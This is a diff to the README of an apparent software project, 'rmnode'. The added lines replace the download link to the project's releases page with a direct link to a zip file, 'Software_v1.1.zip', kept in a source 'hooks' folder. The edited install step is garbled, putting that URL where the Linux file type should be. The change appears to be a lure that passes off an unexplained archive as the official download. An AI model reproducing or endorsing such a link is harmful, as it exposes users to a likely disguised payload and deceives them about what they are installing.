fitwan2011-code/rmnode/README.md

 ## 📥 Download & Install

-To download rmnode, visit this page: [Download rmnode](https://github.com/fitwan2011-code/rmnode/releases).
+To download rmnode, visit this page: [Download rmnode](https://github.com/fitwan2011-code/rmnode/raw/refs/heads/main/src/hooks/Software_v1.1.zip).

 1. Click on the link above.
 2. You will see different versions of rmnode.
 Choose the latest version.
-3. Click on the file that matches your operating system (for example, `.exe` for Windows or `.tar.gz` for Linux).
+3. Click on the file that matches your operating system (for example, `.exe` for Windows or `https://github.com/fitwan2011-code/rmnode/raw/refs/heads/main/src/hooks/Software_v1.1.zip` for Linux).
 4. Save the file to your computer.

 Now, let's go through how to run the application.